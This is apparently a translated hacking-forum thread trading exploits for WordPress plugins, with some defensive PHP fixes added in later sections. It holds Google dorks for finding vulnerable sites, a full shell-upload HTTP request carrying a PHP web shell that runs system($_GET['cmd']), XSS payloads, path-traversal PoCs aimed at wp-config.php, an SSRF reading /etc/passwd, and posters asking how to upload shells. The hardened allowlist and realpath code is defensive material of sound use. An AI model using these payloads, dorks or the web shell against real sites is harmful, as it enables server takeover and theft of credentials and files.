https://github.com/dionach/CMSmap CMSmap is a vulnerability scanner for the popular CMSs WordPress, Joomla and Drupal. Essentially a WPScan analogue, except that it can be run on Windows and supports a web shell.
https://github.com/joren485/WP-Slimstat-SQLI script for exploiting the WP-Slimstat bug http://blog.sucuri.net/2015/02/security-advisory-wp-slimstat-3-9-5-and-lower.html
https://github.com/delvelabs/vane GPL fork of the well-known WPScan scanner
MAC PHOTO GALLERY v. 2.7
dork: inurl:plugins/mac-dock-gallery/ download @version:2.7
Vulnerable code:
PHP:
// $_GET['albid'] is joined to the uploads path without any sanitisation,
// so ../ sequences walk out of wp-content/uploads/mac-dock-gallery/
$file = dirname(dirname(dirname(__FILE__)))."/uploads/mac-dock-gallery/".$_GET['albid'];
header('Content-Description: File Transfer');
header('Content-Type: application/octet-stream');
header('Content-Disposition: attachment; filename='.basename($file));
header('Content-Transfer-Encoding: binary');
header('Expires: 0');
header('Cache-Control: must-revalidate, post-check=0, pre-check=0');
header('Pragma: public');
header('Content-Length: ' . filesize($file));
ob_clean();
flush();
readfile($file); // serves whatever the traversal resolved to
POC:
PATCH: https://wordpress.org/plugins/mac-dock-gallery/other_notes/
Sorry for my English. Does anybody know how to use the latest revslider exploit to upload a shell?
Reference: https://wpvulndb.com/vulnerabilities/7540
Reference: http://blog.sucuri.net/2014/09/slider-revolution-plugin-critical-vulnerability-being-exploited.html
Reference: http://marketblog.envato.com/general/affected-themes/
Reference: http://packetstormsecurity.com/files/129761/
Reference: http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2015-1579
Reference: http://osvdb.org/109645
Reference: http://www.exploit-db.com/exploits/34511/
Reference: http://www.exploit-db.com/exploits/35385/
Reference: http://www.exploit-db.com/exploits/36039/
Thanks
WordPress NextGEN Gallery 2.0.63 Shell Upload Vulnerability
Code:
WordPress NextGEN Gallery plugin version 2.0.63 suffers from a remote shell upload vulnerability.

# Exploit Title: WordPress NextGEN Gallery Plugin 2.0.63 Arbitrary File Upload
# Author: SANTHO ( @s4n7h0 )
# Vendor Homepage: http://wordpress.org/plugins/nextgen-gallery/
# Category: WebApp / CMS / WordPress
# Version: 2.0.63 and less
---------------------------------------------------
Vulnerability Tracking
======================
Reported to vendor : Fri, May 9, 2014 at 9:20 PM
Vendor Acknowledgement : Sat, May 10, 2014 at 2:36 AM
Vendor Informed about patch release (version 2.65) : Mon, May 19, 2014 at 7:54 PM

Vulnerability Details
=======================
POST /index.php/photocrati_ajax?action=upload_image&gallery_id=0&gallery_name= HTTP/1.1
Host: target_ip
User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; rv:28.0) Gecko/20100101 Firefox/28.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://[target_ip]/wp-admin/admin.php?page=ngg_addgallery
Content-Length: 630
Content-Type: multipart/form-data; boundary=---------------------------2427186578189
Cookie: X-Frame-Events_290365e482ebdeeed313858b8a3de791=%7B%22event%22%3A%22new_gallery%22%2C%22gallery_id%22%3A1%2C%22gallery_title%22%3A%22folder_name%22%2C%22context%22%3A%22attach_to_post%22%7D; wordpress_test_cookie=WP+Cookie+check; wordpress_logged_in_57cce18206a53fed21932c6dc2920f94=admin%7C1399203127%7C70f668b775581773d1500b1b8162de42; wp-settings-time-1=1399030444
Connection: keep-alive
Pragma: no-cache
Cache-Control: no-cache

-----------------------------2427186578189
Content-Disposition: form-data; name="name"

cmd.php.jpg
-----------------------------2427186578189
Content-Disposition: form-data; name="file"; filename="cmd.php"
Content-Type: image/jpeg

<HTML><BODY>
<FORM METHOD="GET" NAME="myform" ACTION="">
<INPUT TYPE="text" NAME="cmd">
<INPUT TYPE="submit" VALUE="Send">
</FORM>
<pre>
<?php if($_GET['cmd']) { system($_GET['cmd']); } ?>
</pre>
</BODY></HTML>
-----------------------------2427186578189--

The shell is then accessible at the following URL:
http://[target-ip]/wp-content/gallery/folder_name/cmd.php

# 1337day.com #

Can someone please tell me how to use this thing?
You need to send a POST request in which, on sending, the extension is changed from jpg to php; the shell will then be at /wp-content/gallery/folder_name/shell.php
And there is an XSS in the same plugin:
Code: http://crytotheblind.com/site/wp-content/plugins/mac-dock-gallery/mac_imageview.php?mac_albid=1"><img src=x onerror=alert(1)//">&limit=42
WordPress Twenty Fifteen Theme - DOM XSS Vulnerability - CVE-2015-3429
Affected Versions: 4.2.1 and probably below
Proof of Concept URL for DOM XSS in WordPress:
Code: http://example.com/wp-content/themes/twentyfifteen/genericons/example.html#<img/src/onerror=alert(123)>
Source: http://seclists.org/bugtraq/2015/May/56
This bug was published publicly: https://www.exploit-db.com/exploits/37166/ - WordPress dzs-zoomsounds Plugins <= 2.0 - Remote File Upload
While analysing the bug and the studio that released the vulnerable component, further vulnerable components, themes and standalone scripts shipping the same vulnerable file were found. Here is their product line that I came across with this vulnerable file:
The vulnerable code itself:
PHP:
<?php
/**
 * DZS Upload
 * version: 1.0
 * author: digitalzoomstudio
 * website: http://digitalzoomstudio.net
 *
 * Dual licensed under the MIT and GPL licenses:
 * http://www.opensource.org/licenses/mit-license.php
 * http://www.gnu.org/licenses/gpl.html
 */
$disallowed_filetypes = array('.php', '.exe', '.htaccess', '.asp', '.py', '.jsp', '.pl'); // the set of extensions on this line varies from product to product
$upload_dir = dirname(__FILE__) . '/upload';

function get_theheaders() {
    //$headers = array();
    //print_r($_SERVER);
    return $_SERVER;
}

// Standalone script: no authentication or nonce check precedes the upload.
//print_r($_POST); print_r($HTTP_POST_FILES); print_r($_FILES);
if (isset($_FILES['file_field']['tmp_name'])) {
    $file_name = $_FILES['file_field']['name'];
    $file_name = str_replace(" ", "_", $file_name); // strip spaces
    $path = $upload_dir . "/" . $file_name;
    //print_r($HTTP_POST_FILES);
    //==== checking for disallowed file types
    // case-sensitive substring match against a blacklist
    $sw = false;
    foreach ($disallowed_filetypes as $dft) {
        $pos = strpos($file_name, $dft);
        if ($pos !== false) {
            $sw = true;
        }
    }
    if ($sw == true) {
        die('<div class="error">invalid extension - disallowed_filetypes</div><script>hideFeedbacksCall()</script>');
    }
    if (!is_writable($upload_dir)) {
        die('<div class="error">dir not writable - check permissions</div><script>hideFeedbacksCall()</script>');
    }
    if (copy($_FILES['file_field']['tmp_name'], $path)) {
        echo '<div class="success">file uploaded</div><script>top.hideFeedbacksCall();</script>';
    } else {
        echo '<div class="error">file could not be uploaded</div><script>window.hideFeedbacksCall()</script>';
    }
} else {
    $headers = get_theheaders();
    if (isset($headers['HTTP_X_FILE_NAME'])) {
        //print_r($headers);
        // second upload path: the raw X-File-Name request header becomes the target path
        $file_name = $headers['HTTP_X_FILE_NAME'];
        $file_name = str_replace(" ", "_", $file_name); // strip spaces
        $target = $upload_dir . "/" . $file_name;
        //==== checking for disallowed file types
        $sw = false;
        foreach ($disallowed_filetypes as $dft) {
            $pos = strpos($file_name, $dft);
            if ($pos !== false) {
                $sw = true;
            }
        }
        if ($sw == true) {
            die('<div class="error">invalid extension - disallowed_filetypes</div>');
        }
        if (!is_writable($upload_dir)) {
            die('<div class="error">dir not writable - check permissions</div>');
        }
        //echo $target;
        $content = file_get_contents("php://input"); // raw request body is written as-is
        if (file_put_contents($target, $content)) {
            echo 'success';
        } else {
            die('<div class="error">error at file_put_contents</div>');
        }
    } else {
        die('not for direct access');
    }
}

The widest set of extensions I came across on that line was:
$disallowed_filetypes = array('.php', '.exe', '.shtml', '.html', '.htm','.phtml','.php5', '.php4', '.pl', '.py', '.rb', '.htaccess', '.asp', '.jsp', '.aspx');
But whoever understands this piece of code:
PHP:
foreach ($disallowed_filetypes as $dft) {
    $pos = strpos($file_name, $dft);
    if ($pos !== false) {
        $sw = true;
    }
}
will understand that it is no obstacle for us ;-)

Reflected (passive) XSS:
wp-content/plugins/dzs-videogallery/ajax.php?source="/><script>alert();</script>
wp-content/plugins/dzs-videogallery/ajax.php?type="/><script>alert();</script>

http://digitalzoomstudio.net/ - the author's blog
http://codecanyon.net/user/ZoomIt/portfolio - sales portfolio of the components

P.S.: Tags for Google)) dzs-videogallery exploit, dzs-zoomsounds exploit, dzs-calendar exploit, html5uploader exploit, php_ygallery exploit, php_mediagallery exploit, custom_rapista exploit, themes/royale/ exploit
Look at the functions http://php.net/manual/ru/function.strpos.php and http://php.net/manual/ru/function.stripos.php
I didn't quite get it either: can you simply change the case of the extension, and then such a file gets through?
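To settle the question raised in the last few replies, here is an added example (my own code, not the DZS plugin's) that runs the plugin's blacklist loop unchanged against a handful of constructed filenames, next to a hardened replacement based on an allowlist of lower-cased final extensions. The allowlist of image and audio extensions is an assumption for the example; PHP 7.1 or later is assumed for the type declarations.

```php
<?php
// Added example, not code from the dzs-* plugins: the blacklist check
// quoted above, reproduced verbatim, beside a hardened replacement.

// Widest blacklist variant quoted in the thread.
$disallowed_filetypes = array('.php', '.exe', '.shtml', '.html', '.htm', '.phtml',
    '.php5', '.php4', '.pl', '.py', '.rb', '.htaccess', '.asp', '.jsp', '.aspx');

// The plugin's check: case-sensitive substring search over a blacklist.
// Returns true when the upload would be accepted.
function dzs_original_check(string $file_name, array $disallowed): bool
{
    $sw = false;
    foreach ($disallowed as $dft) {
        $pos = strpos($file_name, $dft);   // strpos is case-sensitive
        if ($pos !== false) {
            $sw = true;
        }
    }
    return !$sw;
}

// Hardened replacement: drop directory components (X-File-Name is used
// as a path above), take only the final extension, lower-case it and
// require it to be on an allowlist.
function hardened_check(string $file_name, array $allowed_ext): bool
{
    $name = basename(str_replace('\\', '/', $file_name));
    if ($name === '' || $name[0] === '.') {
        return false;                      // dotfiles such as .htaccess
    }
    $ext = strtolower(pathinfo($name, PATHINFO_EXTENSION));
    return $ext !== '' && in_array($ext, $allowed_ext, true);
}

// Assumed allowlist for a media upload endpoint.
$allowed_ext = array('jpg', 'jpeg', 'png', 'gif', 'mp3', 'mp4');

// Constructed test names.
$candidates = array(
    'photo.jpg',          // legitimate upload
    'shell.php',          // caught by the blacklist
    'shell.PHP',          // different case: not a substring match, passes the original check
    'shell.Php5',
    'shell.phar',         // extension simply absent from the blacklist
    '../../shell.PHP',    // via X-File-Name also escapes the upload directory
);

foreach ($candidates as $c) {
    printf("%-20s original: %-8s hardened: %s\n", $c,
        dzs_original_check($c, $disallowed_filetypes) ? 'allowed' : 'blocked',
        hardened_check($c, $allowed_ext) ? 'allowed' : 'blocked');
}
```

Whether an uploaded shell.PHP actually executes depends on the server: Apache's mod_mime matches AddHandler/AddType extensions case-insensitively, so it is treated exactly like shell.php, while on nginx it depends on whether the PHP location block uses `~` (case-sensitive) or `~*`. The hardened check sidesteps that question entirely by never trusting anything but a lower-cased final extension from an allowlist.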
WP 3D Twitter Wall
Code:
# Vendor: https://wordpress.org/plugins/3d-twitter-wall/
# /wp-content/plugins/3d-twitter-wall/proxy.php
$url = ($_POST['url']) ? $_POST['url'] : $_GET['url'];
...
$session = curl_init($url); // $url = $_GET['url'] OR $_POST['url'], any scheme curl supports
...
$response = curl_exec($session);
echo $response; // response body is returned to the caller verbatim
curl_close($session);
POC: _http://example.com/plugins/3d-twitter-wall/proxy.php?url=file:///etc/passwd
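The proxy above passes the raw `url` parameter to curl, which happily speaks file://, gopher://, dict:// and friends, and it echoes the body back, so it is a full read SSRF. As an added example (my own code, not the plugin's), here is how such a proxy can be pinned to the one upstream it exists to reach. The host allowlist containing api.twitter.com is an assumption for the example; PHP 7.1 or later is assumed.

```php
<?php
// Added example, not the 3d-twitter-wall plugin's code: validating the
// target URL before it reaches curl, plus curl-side protocol restrictions.

// Upstream hosts this proxy is meant to reach (assumption for the example).
const ALLOWED_HOSTS = array('api.twitter.com');

// Returns null when the URL is acceptable, otherwise a short rejection reason.
function proxy_url_error(string $url): ?string
{
    $p = parse_url($url);
    if ($p === false || !isset($p['scheme'], $p['host'])) {
        return 'no scheme or host';            // file:///etc/passwd lands here
    }
    if (!in_array(strtolower($p['scheme']), array('http', 'https'), true)) {
        return 'scheme not allowed';           // gopher://, dict://, ftp://
    }
    if (!in_array(strtolower($p['host']), ALLOWED_HOSTS, true)) {
        return 'host not allowed';             // 127.0.0.1, 169.254.169.254, ...
    }
    if (isset($p['user']) || isset($p['pass'])) {
        return 'credentials in URL';           // http://api.twitter.com@evil/ is host evil
    }
    return null;
}

function hardened_proxy_fetch(string $url): string
{
    $err = proxy_url_error($url);
    if ($err !== null) {
        http_response_code(400);
        return "rejected: $err";
    }
    $session = curl_init($url);
    curl_setopt_array($session, array(
        CURLOPT_RETURNTRANSFER => true,
        // Defence in depth: curl itself refuses every scheme but http(s),
        // both for the first request and for any redirect target.
        CURLOPT_PROTOCOLS       => CURLPROTO_HTTP | CURLPROTO_HTTPS,
        CURLOPT_REDIR_PROTOCOLS => CURLPROTO_HTTP | CURLPROTO_HTTPS,
        // Do not follow redirects: a 302 from the allowed host to an
        // internal address would otherwise bypass the host check.
        CURLOPT_FOLLOWLOCATION  => false,
        CURLOPT_TIMEOUT         => 10,
    ));
    $response = curl_exec($session);
    curl_close($session);
    return $response === false ? '' : $response;
}

// Constructed inputs for an offline check of the validator alone.
foreach (array(
    'https://api.twitter.com/1.1/search/tweets.json?q=wordpress',
    'file:///etc/passwd',
    'http://169.254.169.254/latest/meta-data/',
    'gopher://127.0.0.1:6379/_FLUSHALL',
    'http://api.twitter.com@evil.example/',
) as $u) {
    printf("%-62s %s\n", $u, proxy_url_error($u) ?? 'ok');
}
```

The host allowlist and the curl protocol mask cover different failure modes: the allowlist stops the request from ever being made, while CURLOPT_PROTOCOLS and CURLOPT_REDIR_PROTOCOLS mean that even a validator bug cannot turn the proxy back into a file:// reader. Pinning hosts by name still leaves DNS rebinding open; resolving the name yourself and rejecting private ranges is the next step if that matters in your deployment.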
WordPress CP Image Store with Slideshow 1.0.5 [Arbitrary file download vulnerability]
Code:
# Exploit Title: WordPress CP Image Store with Slideshow 1.0.5 [Arbitrary file download vulnerability]
# Date: 2015-07-10
# Google Dork:
# Exploit Author: Joaquin Ramirez Martinez [ i0akiN SEC-LABORATORY ]
# Vendor Homepage: http://wordpress.dwbooster.com/
# Software Link: https://downloads.wordpress.org/plugin/cp-image-store.1.0.5.zip
# Version: 1.0.5
# Tested on: windows 7 + firefox.

====================
DESCRIPTION
====================
A vulnerability has been detected in the WordPress CP Image Store with Slideshow plugin in version 1.0.5. The vulnerability allows remote attackers to download arbitrary files from the server.
The arbitrary file download vulnerability is located in the `cp-image-store.php` file. The web vulnerability can be exploited by remote attackers without a privileged application user account and without user interaction. Successful exploitation of the arbitrary file download vulnerability results in application compromise.

==============
POC
==============
# http://wp-host/wp-path/?action=cpis_init&cpis-action=f-download&purchase_id=1&[email protected]&f=../../../../wp-config.php HTTP/1.1

The purchase_id parameter can be bruteforced to successfully exploit this vulnerability.

==================
VULNERABLE CODE
==================
Located in cp-image-store.php

function cpis_download_file(){
    ...
    if( isset( $_REQUEST[ 'f' ] ) && cpis_check_download_permissions() ){
        header( 'Content-Type: '.cpis_mime_content_type( basename( $_REQUEST[ 'f' ] ) ) );
        header( 'Content-Disposition: attachment; filename="'.$_REQUEST[ 'f' ].'"' );
        if( cpis_checkMemory( array( CPIS_DOWNLOAD.'/'.$_REQUEST[ 'f' ] ) ) ){
            readfile( CPIS_DOWNLOAD.'/'.$_REQUEST[ 'f' ] ); // 'f' is joined to the download dir unsanitised
        }else{
            @unlink( CPIS_DOWNLOAD.'/.htaccess');
            header( 'location:'.CPIS_PLUGIN_URL.'/downloads/'.$_REQUEST[ 'f' ] );
        }
    ...
}
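Both this plugin and the mac-dock-gallery one earlier in the thread have the same shape of bug: a request parameter (`f` here, `albid` there) is glued onto a base directory and handed to readfile(). As an added example that is not code from either plugin, here is a download handler that resolves the request against the base directory and refuses anything that does not end up as a regular file strictly inside it. The base directory constant and the function names are hypothetical; PHP 7.1 or later is assumed.

```php
<?php
// Added example, not code from mac-dock-gallery or CP Image Store: a
// readfile() handler that cannot be steered outside its directory.

// Hypothetical base directory for the example.
define('DOWNLOAD_DIR', '/var/www/html/wp-content/uploads/mac-dock-gallery');

// Resolve the requested name against $base_dir. Returns the absolute path
// of a regular file inside $base_dir, or null for anything else.
function resolve_download(string $base_dir, string $requested): ?string
{
    $base = realpath($base_dir);
    if ($base === false) {
        return null;
    }
    // A gallery download is a bare filename, never a path, so throw away
    // every directory component the client sent (../, /, \).
    $name = basename(str_replace('\\', '/', $requested));
    if ($name === '' || $name === '.' || $name === '..' || $name[0] === '.') {
        return null;
    }
    $target = realpath($base . DIRECTORY_SEPARATOR . $name);
    if ($target === false || !is_file($target)) {
        return null;                       // missing file or dangling symlink
    }
    // Containment check on the resolved path, so a symlink planted inside
    // the directory cannot point readfile() at wp-config.php either.
    if (strpos($target, $base . DIRECTORY_SEPARATOR) !== 0) {
        return null;
    }
    return $target;
}

function send_download(string $base_dir, string $requested): void
{
    $file = resolve_download($base_dir, $requested);
    if ($file === null) {
        http_response_code(404);
        exit('not found');
    }
    header('Content-Type: application/octet-stream');
    // The filename in the header comes from the resolved path, not the
    // request; CR, LF and quotes are stripped so it cannot break the header.
    $safe_name = str_replace(array("\r", "\n", '"'), '', basename($file));
    header('Content-Disposition: attachment; filename="' . $safe_name . '"');
    header('Content-Length: ' . filesize($file));
    readfile($file);
    exit;
}

// Usage, in place of the vulnerable handlers:
//   send_download(DOWNLOAD_DIR, $_GET['albid'] ?? '');
// ?albid=../../../wp-config.php is reduced to the bare name wp-config.php,
// which is looked up inside the gallery directory only and yields a 404.
```

The basename() step alone already defeats the ../ payloads shown in both advisories; the realpath() containment check is what also closes the symlink case, and it is cheap enough that there is no reason to leave it out. Note that the CP Image Store code has a second sink, the Location header built from the same parameter, which the same resolve-then-check pattern should gate as well.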